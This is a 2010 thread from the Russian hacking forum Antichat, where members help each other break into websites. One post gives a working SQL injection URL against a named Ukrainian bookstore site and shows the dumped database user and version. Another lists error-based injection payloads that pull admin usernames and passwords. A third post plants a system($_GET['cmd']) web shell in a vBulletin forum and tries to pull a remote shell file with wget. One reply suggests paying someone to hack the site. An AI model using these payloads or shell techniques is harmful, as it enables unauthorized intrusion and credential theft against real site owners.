ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12781  
Старый 27.04.2010, 14:20
ExQ
Познающий
Регистрация: 08.04.2010
Сообщений: 34
Провел на форуме:
277809

Репутация: 1
По умолчанию

Что значит эта ошибка?
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/kniga-market/kniga-market.kiev.ua/about.php on line 7
 
Ответить с цитированием

  #12782  
Старый 27.04.2010, 14:45
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095

Репутация: 34
Отправить сообщение для kfor с помощью ICQ
По умолчанию

Цитата:
Сообщение от ExQ  
Что значит эта ошибка?
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/kniga-market/kniga-market.kiev.ua/about.php on line 7
то что ты ковычку зафигачил в параметр =)) Возможно есть sql inj. ты покажи запрос который ты отправляешь. Если это выдаёт просто скрипт без параметров, то скорее всего он просто криво написан.
 
Ответить с цитированием

  #12783  
Старый 27.04.2010, 14:49
ExQ
Познающий
Регистрация: 08.04.2010
Сообщений: 34
Провел на форуме:
277809

Репутация: 1
По умолчанию

Цитата:
Сообщение от kfor  
то что ты ковычку зафигачил в параметр =)) Возможно есть sql inj. ты покажи запрос который ты отправляешь. Если это выдаёт просто скрипт без параметров, то скорее всего он просто криво написан.

http://kniga-market.kiev.ua/about.php?id=121&crm=1&tmp=-41+union+select+1+from+тут название таблички --
 
Ответить с цитированием

  #12784  
Старый 27.04.2010, 14:50
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

А пройти по указанному линку никак, не?
http://kniga-market.kiev.ua/about.php - просто бага
http://kniga-market.kiev.ua/producers.php?category=10' - скуля
Код:
http://kniga-market.kiev.ua/producers.php?category=10+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4+--
u_knigamarke@localhost:4.1.22-log:knigamarket
 
Ответить с цитированием

  #12785  
Старый 27.04.2010, 14:54
ExQ
Познающий
Регистрация: 08.04.2010
Сообщений: 34
Провел на форуме:
277809

Репутация: 1
По умолчанию

Цитата:
Сообщение от wildshaman  
А пройти по указанному линку никак, не?
http://kniga-market.kiev.ua/about.php - просто бага
http://kniga-market.kiev.ua/producers.php?category=10' - скуля
Код:
http://kniga-market.kiev.ua/producers.php?category=10+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4+--
u_knigamarke@localhost:4.1.22-log:knigamarket

Ссори.. сильно не пинайте)
совсем ламер в этих делах


Ну а что делать дальше?

Последний раз редактировалось ExQ; 27.04.2010 в 14:59..
 
Ответить с цитированием

  #12786  
Старый 27.04.2010, 15:10
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от ExQ  
Ну а что делать дальше?
Читать форум, статей куча, и не флудить в теме.
Если читать не умеешь, а сайт нужен, дать денег кому-нить, кто сломает. Всё просто
 
Ответить с цитированием

  #12787  
Старый 27.04.2010, 16:27
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
Arrow

Тема с выводом инфы через ошибки такая забавная.

Раз:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,user(),version())+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a
PHP код:
Error 1062Duplicate entry 'user@siteserv:5.1.29-rc-log1' for key 'group_key' 
Два:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,user,password)+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a
PHP код:
Item not found 
//WTF? Поле password точно есть.

Три:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+user+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a
PHP код:
Error 1062Duplicate entry 'admin1' for key 'group_key' 
Четыре:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+password+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a
PHP код:
Item not found 
//WTF

Пять:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+password+from+users+WHERE+user='admin'),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a
PHP код:
Item not found 
//WTF

Шесть:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+substring(password,1,5)+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a
PHP код:
Error 1062Duplicate entry 'mypas1' for key 'group_key' 
В итоге работает такой костыль:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+concat_ws(user,substring(password,1,300))+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a
PHP код:
Error 1062Duplicate entry 'admin:mypassword1' for key 'group_key' 

И таки откуда такая проблема и как ее обойти? Substring - не выход, я считаю.
 
Ответить с цитированием

  #12788  
Старый 27.04.2010, 17:01
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #12789  
Старый 27.04.2010, 17:44
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию

Qwazar
Оно.
Кстати, как показала практика, необязательно резать строку, достаточно ее просто прогнать через эти функции в стиле substr(column,1,350). Ограничение будет, но уже меньше. Причем число 350 получается как некая константа минус длина имен колонок в подзапросе(или вроде того). Надо дальше копать.
Цитата:
view.php?id=(select+1+from+(select+count(0),concat ((select+concat(0x7c7c,mid(val,1,490),0x7c7c)+from+settings+LIMIT+0,1),floor(rand(0)*3 ))+from+information_schema.tables+group+by+2+limit +1,1)a)
Cрабатывает.

Цитата:
view.php?id=(select+1+from+(select+count(0),concat ((select+concat(0x7c7c7c,mid(val,1,490),0x7c7c)+from+settings+LIMIT+0,1),floor(rand(0)*3 ))+from+information_schema.tables+group+by+2+limit +1,1)a)
Не срабатывает.

Цитата:
view.php?id=(select+1+from+(select+count(0),concat ((select+concat(0x7c7c7c,mid(val,1,489),0x7c7c)+from+settings+LIMIT+0,1),floor(rand(0)*3 ))+from+information_schema.tables+group+by+2+limit +1,1)a)
Срабатывает.
 
Ответить с цитированием

  #12790  
Старый 27.04.2010, 18:21
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию

Такой вопрос,
как залить шелл = \
vb 4.0.2
Есть доступ к админке, добавил модуль в faq_complete с содержимым
Цитата:
system($_GET["cmd"]);
OC там Linux
Пишу в адресной строке:
http://forum.site.ru/faq.php?cmd=ls
Вижу файлы и папки корня)
Делаю такой запрос в адресной строке:
forum.site.ru/faq.php?cmd=wget www.sitesshelom.ru/shell.php
Долго думает ) и потом вылазит 404 not found, вообщем шелл не заливается = \
подскажите как залить еще можно = \
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ